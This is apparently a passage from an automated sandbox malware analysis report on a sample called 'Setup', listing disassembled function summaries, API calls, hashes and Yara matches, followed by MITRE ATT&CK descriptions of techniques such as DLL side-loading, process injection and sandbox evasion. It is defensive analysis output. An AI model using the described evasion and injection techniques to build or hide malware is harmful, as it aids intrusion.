CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 031CE1CF
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 031CE1F1
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 031CE210
CloseHandle.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 031CE226

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: 2399b34309de1abd901b94b7910aa0a6c2b2b7890f4fe88988dd71c8d814c5c6
Instruction ID: 6f6349b104505f73103390bd27ac74770829bb7d9db3a151070649171acf4c52
Opcode Fuzzy Hash: 2399b34309de1abd901b94b7910aa0a6c2b2b7890f4fe88988dd71c8d814c5c6
Instruction Fuzzy Hash: 5011A371790214ABDB10DE68AD8DF7AB77CAB5EB11F14825CF500AB1C4DB70B80486A1

Function 02DA328E Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02DA32AA
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02DA32C3

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 19ff3a3b1c0fb98505645bafc6050a4638d904fbdad8d99c4c42bb6ae46b1f43
Instruction ID: 23d3bd66353be0bdbcb9571fba7813d0bc862dfd8e4b96ba8bb4591abd3423e0
Opcode Fuzzy Hash: 19ff3a3b1c0fb98505645bafc6050a4638d904fbdad8d99c4c42bb6ae46b1f43
Instruction Fuzzy Hash: BE01F73220E7916EAA6527B97CF8E1A2B57DB41774B30427EF520453E0EFD14C1096E8

Function 02D8A0E8 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D8A0EF
std::_Lockit::_Lockit.LIBCPMT ref: 02D8A0FA
std::_Lockit::~_Lockit.LIBCPMT ref: 02D8A168

Part of subcall function 02D8A27B: std::locale::_Locimp::_Locimp.LIBCPMT ref: 02D8A293

std::locale::_Setgloballocale.LIBCPMT ref: 02D8A115

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: af8a9120320a6be9aca0b7c4beea30fe8acf883fca1089df6c6845f174338a80
Instruction ID: a1ad204587df374aab951442825fa00727d4f841cd7deb582560ab3f2f9b493a
Opcode Fuzzy Hash: af8a9120320a6be9aca0b7c4beea30fe8acf883fca1089df6c6845f174338a80
Instruction Fuzzy Hash: 6C017C75A015119BCB06FF60D994ABDBBA2FF84750F29409ED80257380DF356E42CFA9

Function 031D8904 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031D890B
std::_Lockit::_Lockit.LIBCPMT ref: 031D8916
std::_Lockit::~_Lockit.LIBCPMT ref: 031D8984

Part of subcall function 031D8A97: std::locale::_Locimp::_Locimp.LIBCPMT ref: 031D8AAF

std::locale::_Setgloballocale.LIBCPMT ref: 031D8931

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: b50bc13ec64ffe87faccdd1d077fcce052c79c57b34b05cbb5d7454b061b0dd1
Instruction ID: ba704aa5dcbc0831f18711ba86f1364aeffcec75e0b12c659c9bd414a3bfbb3e
Opcode Fuzzy Hash: b50bc13ec64ffe87faccdd1d077fcce052c79c57b34b05cbb5d7454b061b0dd1
Instruction Fuzzy Hash: 580184B96012219FC705FF64E95497D7BF1FF9A640B184008D8025B384CF786A91CBC1

Function 02D9106B Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D91072
std::_Lockit::_Lockit.LIBCPMT ref: 02D9107C

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Lockit::~_Lockit.LIBCPMT ref: 02D910ED

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: 70c87bdda0fd07e2d3989441a3f7056200c31740e272e497f8c858e2d1b7f537
Instruction ID: 029d0289d71efb560c527260bd95c96e51ff0e7204b799bde9421203b8fad18d
Opcode Fuzzy Hash: 70c87bdda0fd07e2d3989441a3f7056200c31740e272e497f8c858e2d1b7f537
Instruction Fuzzy Hash: D4F090329005169BCF05FBA4C8606FEB722EF40711F60851DE9156B3C0EF76DE068BA5

Function 02D91100 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D91107
std::_Lockit::_Lockit.LIBCPMT ref: 02D91111

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Lockit::~_Lockit.LIBCPMT ref: 02D91182

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: d5ff3716c4062411fd575accb4c8212aee0a45f577c63d983057cd3d5edba7ca
Instruction ID: 9eb636c91bb3eb537c6be76e4a05e69e1e1d02ee010f4ff1a2a388d00149327f
Opcode Fuzzy Hash: d5ff3716c4062411fd575accb4c8212aee0a45f577c63d983057cd3d5edba7ca
Instruction Fuzzy Hash: C2F06D31910516ABCF05FB64C8606FE6622EF40724F644519E9246B3C0EF75DE418FA5

Function 02D90FD6 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D90FDD
std::_Lockit::_Lockit.LIBCPMT ref: 02D90FE7

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Lockit::~_Lockit.LIBCPMT ref: 02D91058

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: ee4847afd6d8dd9f3f0054ed2b120fc231305d76b8d05e3d82fa52ff576c59bf
Instruction ID: 16db95a3173f651ad0e0cf367b4403351b479db6d01847f40d4303b63a5bae1c
Opcode Fuzzy Hash: ee4847afd6d8dd9f3f0054ed2b120fc231305d76b8d05e3d82fa52ff576c59bf
Instruction Fuzzy Hash: D7F0CD3180011A9ECF05FBA4C8606BE6662EF40320F204519E9186B3C0DF76CE01CBA5

Function 02D90F41 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D90F48
std::_Lockit::_Lockit.LIBCPMT ref: 02D90F52

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Lockit::~_Lockit.LIBCPMT ref: 02D90FC3

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: 4b402089a9de233b4e65ebc637db98c4c1fb353b1df5abb15a3887595f7e0078
Instruction ID: fed3dc36471c1ac188e2bb34f86e114e43bdb715e6cc8793d2e9cb26309cbb61
Opcode Fuzzy Hash: 4b402089a9de233b4e65ebc637db98c4c1fb353b1df5abb15a3887595f7e0078
Instruction Fuzzy Hash: F2F06D329101159BCF05FA64C9507FDA726EF40721F604619EA11AB3C0EF759E058BA5

Function 03210627 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,031F3AD5,00000000,00000000,?,0320D52D,00000000,00000001,?,?,?,032029BA,?,00000000,00000000), ref: 0321063E
GetLastError.KERNEL32(?,0320D52D,00000000,00000001,?,?,?,032029BA,?,00000000,00000000,?,?,?,03202F5D,?), ref: 0321064A

Part of subcall function 03210610: CloseHandle.KERNEL32(03235AD0,0321065A,?,0320D52D,00000000,00000001,?,?,?,032029BA,?,00000000,00000000,?,?), ref: 03210620

___initconout.LIBCMT ref: 0321065A

Part of subcall function 032105C6: CreateFileW.KERNEL32(03224E78,40000000,00000003,00000000,00000003,00000000,00000000,032105F5,0320D51A,?,?,032029BA,?,00000000,00000000,?), ref: 032105D9

WriteConsoleW.KERNEL32(00000000,?,031F3AD5,00000000,?,0320D52D,00000000,00000001,?,?,?,032029BA,?,00000000,00000000,?), ref: 0321066F

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9a74a2a8787f6e220425e2323d34d24e516ef433d995d8120e2c19ee6b28deac
Instruction ID: 2d7043e8fecb5245a2ad9b59a48fb26dc9bfde85aa9e1c9c15ac8ec96ea280c7
Opcode Fuzzy Hash: 9a74a2a8787f6e220425e2323d34d24e516ef433d995d8120e2c19ee6b28deac
Instruction Fuzzy Hash: 0BF0373A554169BBCF227F91ED0898A3F65FF597A0F14C051FD0985114DB3299B0AB90

Function 02D91195 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9119C
std::_Lockit::_Lockit.LIBCPMT ref: 02D911A6

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

moneypunct.LIBCPMT ref: 02D911E0
std::_Lockit::~_Lockit.LIBCPMT ref: 02D91217

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3moneypunct
String ID:
API String ID: 3160146232-0
Opcode ID: b3a4839c0251b73f9c28f1cf63f9e1e194ad0f70ce308f8a78b9cf7ead9a99e6
Instruction ID: d6af6bbc310c775a10fc6ab12005ada1b2f1c02423706eee1d1a9c1ac6fdad82
Opcode Fuzzy Hash: b3a4839c0251b73f9c28f1cf63f9e1e194ad0f70ce308f8a78b9cf7ead9a99e6
Instruction Fuzzy Hash: C5F05E3190015AABCF01FB90C9107FD6666EF80700F504018E9056B390DB759E018FA5

Function 031DB850 Relevance: 6.0, APIs: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(0321E1A0), ref: 031DB856
GetProcAddress.KERNEL32(00000000,0321E1BC), ref: 031DB864
GetProcAddress.KERNEL32(00000000,0321E1D0), ref: 031DB875
GetProcAddress.KERNEL32(00000000,0321E1F0), ref: 031DB886

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID:
API String ID: 667068680-0
Opcode ID: fc244b007c3fc052dbffed887ec551b8e078986a87e48b52e9baa09c3c56fe83
Instruction ID: de3f722b3280060de76a1bbbd54cc2a482464b68865dc6edc7d412a58b70703b
Opcode Fuzzy Hash: fc244b007c3fc052dbffed887ec551b8e078986a87e48b52e9baa09c3c56fe83
Instruction Fuzzy Hash: 64E086755963309FC740BF747E0D98A7AE4EA26E003028511FC00C2509DBB408C0CB90

Function 031F9355 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 031F94CC

Strings

-, xrefs: 031F941D
+, xrefs: 031F942A

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: 7d86644e1283cfaa69a9a237bde454d26c6d8be59227446baf86fc9dd63f69b2
Instruction ID: 75e01cc87e7c4eb6d6bc8e7c264d83b4dbd99a7e884b40e7087513a9280b39f9
Opcode Fuzzy Hash: 7d86644e1283cfaa69a9a237bde454d26c6d8be59227446baf86fc9dd63f69b2
Instruction Fuzzy Hash: 45A1D470A00249AFDF24EE78C8507FE7BA5EF5A224F0C855AEAA5DB390C334D542CB50

Function 031EEB7E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 184COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 031EECE5

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 031EEC43, 031EEC7A, 031EEC7F
-, xrefs: 031EED13

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: ca51503fa198191965524fb30ee68e9a366afd6daacc92cfbf9252eda289fea7
Instruction ID: 59a1503ec8377d6c018750478025dd228484f31d2deaf2478ad27b76e0b54cfb
Opcode Fuzzy Hash: ca51503fa198191965524fb30ee68e9a366afd6daacc92cfbf9252eda289fea7
Instruction Fuzzy Hash: 5151D670A04A699FDF25CEAD88407BEFFF9AF4D610F0844AAD481D7240D3769581CB71

Function 02D7F464 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 02D7F5C4

Strings

0vH, xrefs: 02D7F524
8vH, xrefs: 02D7F55D

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: 0vH$8vH
API String ID: 118556049-2226986219
Opcode ID: ff33dc7922dc2eddd473bd00180b6ac851c50391568b80d18f8cfdcbe3271453
Instruction ID: fef4f58d1a5cc9f3c06358998a873a8e04858d451424da034d8139aeea781f52
Opcode Fuzzy Hash: ff33dc7922dc2eddd473bd00180b6ac851c50391568b80d18f8cfdcbe3271453
Instruction Fuzzy Hash: 63512831D082409FCF31DF68C840BAABBB6EB45714F1882AED8555B785E77ADD05CBA0

Function 031CDC80 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 031CDDE0

Strings

false, xrefs: 031CDD40
true, xrefs: 031CDD79

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: false$true
API String ID: 118556049-2658103896
Opcode ID: 186db1f3c7270808b967a0588a532b178f0628107f4875af88d0f011f4cff5e1
Instruction ID: eee3a2c0eed3e0f135381230674e1d7bcdec84833518f09184a8c2b1b7503ea2
Opcode Fuzzy Hash: 186db1f3c7270808b967a0588a532b178f0628107f4875af88d0f011f4cff5e1
Instruction Fuzzy Hash: 3E513835D043909FCB20CF28D8007BABBB5EB9A610F1881ADD8655B381DB769905CB90

Function 02D7F2D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 02D7F45E

Strings

0vH, xrefs: 02D7F3BD
8vH, xrefs: 02D7F3F1

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: 0vH$8vH
API String ID: 118556049-2226986219
Opcode ID: 413783ce1d8b7bf010adf0d91d9b194f15894087087c851485b2c2ae9e3811e4
Instruction ID: b58ce053bf7d7866d4843c7f49f4eef7c9bb92a666da950e0a28417af3dfcb59
Opcode Fuzzy Hash: 413783ce1d8b7bf010adf0d91d9b194f15894087087c851485b2c2ae9e3811e4
Instruction Fuzzy Hash: B641E531A042458FCF21CF68C9407AABFB5EF86314F18C1AED8945B345D7BA9906CBA1

Function 031CDAF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 031CDC7A

Strings

false, xrefs: 031CDBD9
true, xrefs: 031CDC0D

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: false$true
API String ID: 118556049-2658103896
Opcode ID: f3634662b1aebe0de1c61e46d6723c17d6fc1bd2b5ed31766435a864d0f8c332
Instruction ID: d5a3958a815c0fa2c74dc8c7cb4e9701e19c1b7e9ad63a1eb3c30fa422b207e5
Opcode Fuzzy Hash: f3634662b1aebe0de1c61e46d6723c17d6fc1bd2b5ed31766435a864d0f8c332
Instruction Fuzzy Hash: 7241F8759042819FCF10CF68D9403AABFF5EF9A310F1881ADD8549F346C7B69A05CB91

Function 02DA1054 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 02DA1093
__IsNonwritableInCurrentImage.LIBCMT ref: 02DA1147

Strings

csm, xrefs: 02DA1131

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: dc4570d85e6018797a7426dc425d82f38a4a302b79d62b8f7d776e071b001b23
Instruction ID: f189790b2e653c0da1b9bf296c3d0a75e79f6391f25e365142869bc51d758f0e
Opcode Fuzzy Hash: dc4570d85e6018797a7426dc425d82f38a4a302b79d62b8f7d776e071b001b23
Instruction Fuzzy Hash: 0641A434A00219ABCF10DF69C8A4E9EBBB5EF45314F2481A5E818AB391D735DE15CFA1

Function 031EF870 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 031EF8AF
__IsNonwritableInCurrentImage.LIBCMT ref: 031EF963

Strings

csm, xrefs: 031EF94D

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: a06e0d7a6e3e47ac1d43012704f51ef289f0dc22d6fe39919e991c5a36f96cb9
Instruction ID: 3eff35e10a5c8460b850a748d0f30f742f6bc4b4dff0e19e1c0bc9f7cf0f60ca
Opcode Fuzzy Hash: a06e0d7a6e3e47ac1d43012704f51ef289f0dc22d6fe39919e991c5a36f96cb9
Instruction Fuzzy Hash: 1341A338A00618AFCF10DF68C884A9EBBB5EF4D324F198055ED585F355D732EA52CB91

Function 02DA39A1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 02DA3AAC

Strings

RCC, xrefs: 02DA39E0
MOC, xrefs: 02DA39D8

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 5b0177aa4fcb61b795d5e31654247f54bf0e3a295920037b57f5144041711d77
Instruction ID: f9ae65aa1ec8f355a682e01a49909f5f60aa63391281fe0001797bf280652566
Opcode Fuzzy Hash: 5b0177aa4fcb61b795d5e31654247f54bf0e3a295920037b57f5144041711d77
Instruction Fuzzy Hash: 1F413472900219AFCF16CF98C990EEEBBB6EF48304F188099E906A6260D335DD50DF60

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

